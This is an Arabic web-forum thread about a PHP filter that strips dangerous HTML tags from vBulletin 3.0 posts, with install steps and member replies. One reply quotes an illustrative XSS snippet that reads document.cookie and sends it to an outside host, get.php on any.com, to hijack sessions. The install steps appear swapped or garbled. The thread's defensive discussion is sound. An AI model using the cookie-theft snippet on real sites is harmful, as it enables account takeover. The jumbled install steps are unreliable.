موضوع جميل ..
ومناقشة أجمل ..
والشكر لكم ..
موضوع جميل ..
ومناقشة أجمل ..
والشكر لكم ..
__________________
استخدم خاصية تنبيه المشرفين للضرورة وعند ملاحظة موضوع يخالف قوانين منتديات سوالف وسيتم مراجعة الموضوع او المشاركة المبلغ عنها على الفور
السلام عليكم
ما النتيجة النهائية التي وصلت لها أخي العندليب هل هناك من مزيد غير هذه الأوسمة الخطرة وهل ستضع هاك معين أو أوامر في أحد الملفات لتنفيذ الفلترة على الأوسمة
السلام عليكم ورحمة الله وبركاته
أخواني ما أجمل النقاش المثمر معكم.
الحمدلله لقد قمت بعمل داله للفلتره أرجو إختبارها منكم وإبداء أي ملاحظات لتحسين الكوود.
الملف بالمرفق
طريقة التركيب على منتديات الـ vb الجيل الثالث إصدار 3,0
1- قم برفع ملف functions_custom.php الى مجلد Includes .
2- قم بفتح ملف functions.php وأبحث عن السطر التالي:
2- أضف بعده السطر التالي :كود PHP:
error_reporting(E_ALL & ~E_NOTICE);
3- قم بفتح ملف functions_newpost.php وأبحث عن السطر التالي :كود PHP:
require_once('./includes/functions_custom.php');
4- إستبدله بالسطر التالي:كود PHP:
$post['message'] = trim($post['message']);
كود PHP:
$post['message'] = strip_Tag(trim($post['message']));
5- قم بتفعيل الـ html في المنتدى وقم بالتجربه بإدراج موضوع مكتوب بالـ html وبالأكواد الخطيره التي ذكرناها .
أرجوا إثراء الموضوع مثل المناقشه السابقه وبارك الله بكم.
متميز العندليب
إلى الأمام
الله يعطيك العافية اخوي العندليب
انسان محب للخير بارك الله فيك
جزاك الله خيرا اخي العزيز
جزاك الله كل خير
مهمه فعلا
وان شاء الله تزيد في تطويرها
جزالك الله خير
الله يعطيك الف عافيه
أشكركم يا أخواني على مروركم بارك الله فيكم
نريد نتائج التجربه مشكورين
ألف شكر للأخ العندليب على طرحه للموضوع
هذه النقطة فعلا غاية في الخطورة .. لا تكمن خطورتها فقط في تغيير شكل المنتدى أو اللعب في أوامر برنامجك ..
ولكن لنقل أنك مثلا عملت " سجل زوار " .. وكانت ال HTML مفعلة ..
ثم قام شخص مثلا بوضع الكود :
(( الكود أعتقد غير صحيح من ناحية ال Syntax ولكن أنا أقصد الفكرة عامة ))كود PHP:
<script>
Cook = document.cookie;
</script>
<a href="http://www.any.com/get.php?cook=javascript::Cook">إضغط لمشاهدة الصورة</a>
وفي صفحة get.php يستطيع الشخص أن يقوم مثلا بإرسال محتويات المتغير ( Cook ) والذي بدوره يحتوي على معلومات الكوكيز للشخص الذي ضغط على اللنك ..
فيقوم مثلا بإرسال محتويات الكوكيز إلى بريده .. ثم يأخذ تلك المحتويات من بريده .. ليقوم بوضعها في ملف تكست محترم .. في فولدر Cookies
ثم يقوم بالدخول إلى المنتدى مثلا .. ليجد عبارة " مرحبا بك يا عضو " .. وعضو = عضوية الشخص اللي ضغط اللنك
تفعيل ال HTML خطر لأبعد الحدود .. ولا يوجد للأسف مجال للفلترة الكاملة ..
تسمى مثل هذه الثغرات ب XSS scripting bugs ..
الأخ Egyptechno أشكرك على الإضافه ولكن هل جربت الكوود الذي أرفقته أنت على الفلتر ؟
بالتأكيد لا
لو قمت بتمريره عبر الفلتر لأصبح مثل الشكل التالي:
أما رمز javascript: فهذا يتم تغييره في برمجة المنتدى vb لأن تصميمي لهذا الكوود أتى في الأساس لكي يتوافق مع الـ vb أولا .كود HTML:<a href="http://www.any.com/get.php?cook=javascript::Cook">إضغط لمشاهدة الصورة</a>
لو قرأت أول الموضوع لعرفت أنني أتكلم عن فلترة الرموز التي ذكرناها والزملاء الى الان يبدون ملاحظاتهم
ولا تنسى أن الكوود تحت التجربه حتى الان
موفق
شيء جميل
ولكن المشكلة
أن الأعضاء مايعطون وجه
تلقى الواحد يحط الجمل صور بدل نصوص
وبعدين انتظر اسبوع لين تفتح الصفحة
عموما هي مفيدة في بعض التخصصات
بإمكانك تحديد العدد الأقصى للصور بأي موضوع من خيارات المنتدى لو كان لديك منتدى.المشاركة الأصلية كتبت بواسطة fayz
ولكي يكون الكوود عام ويركب على أي سكربت اخر غير سكربت المنتديات سأضيف داله أخرى لحساب مجموع الرموز لرمز معين مثل img أو غيرها .
شكراً لك
عندليب باشا ..
واخد بالي
أنا فقط أحببت طرح جانب آخر من المشكلة
على العموم لدي لك بعض الأفكار .. لو عندك ماسنجر :
egyptechno آت هوتميل
تحياتي
أنت حقاً أفضل مثال نقدمة لكل هاكرز يدافع عن الحقوق و المواقع العربية بشكل مثالى .
__________________
الطاووس ..